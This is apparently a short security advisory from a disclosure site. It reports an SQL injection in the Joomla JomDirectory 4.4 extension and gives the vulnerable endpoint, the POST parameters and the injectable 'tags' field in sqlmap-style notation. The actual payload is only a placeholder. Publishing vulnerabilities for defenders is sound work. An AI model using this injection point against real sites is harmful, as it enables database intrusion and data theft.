Joomla JomDirectory 4.4 SQL Injection

2018.01.03
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################ #Title: Joomla JomDirectory 4.4 - SQL Injection #Credit: Bilal KARDADOU #Vendor: http://comdev.eu/jomdirectory/ #URL: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/jomdirectory/ #Product: 'Joomla JomDirectory 4.4' #Developer: Comdev #Extension type: Plugin #Last updated: Oct 29 2017 #Compatibility: 3.X #Type: Paid download #Google Dork: N/A ################################################ # # Description: # Building your own business directory site is now easy and quick! Increase user experience of your business directory website with the most versatile extension # that smoothly integrates with Joomla. # # --Method=POST -p [tags] # # -u "http://127.0.0.1/joomla/index.php?option=com_jomcomdev&task=maps.items&format=json&extension=com_jomdirectory&limit=100" # # --data="address-lat-lng=&distance=25&latitude=&longitude=&tags=[SQLI]&search=&categories_id=134&favorites=0&featured=0&93a3a2bbe8ed22d8e8e8584b39cc1834=1&" # PoC: # https://prnt.sc/hurom8 # # Momo Martin Machi rajel Tetouani 7a9ir # Bilal KARDADOU - https://www.linkedin.com/in/kardadou/) ################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top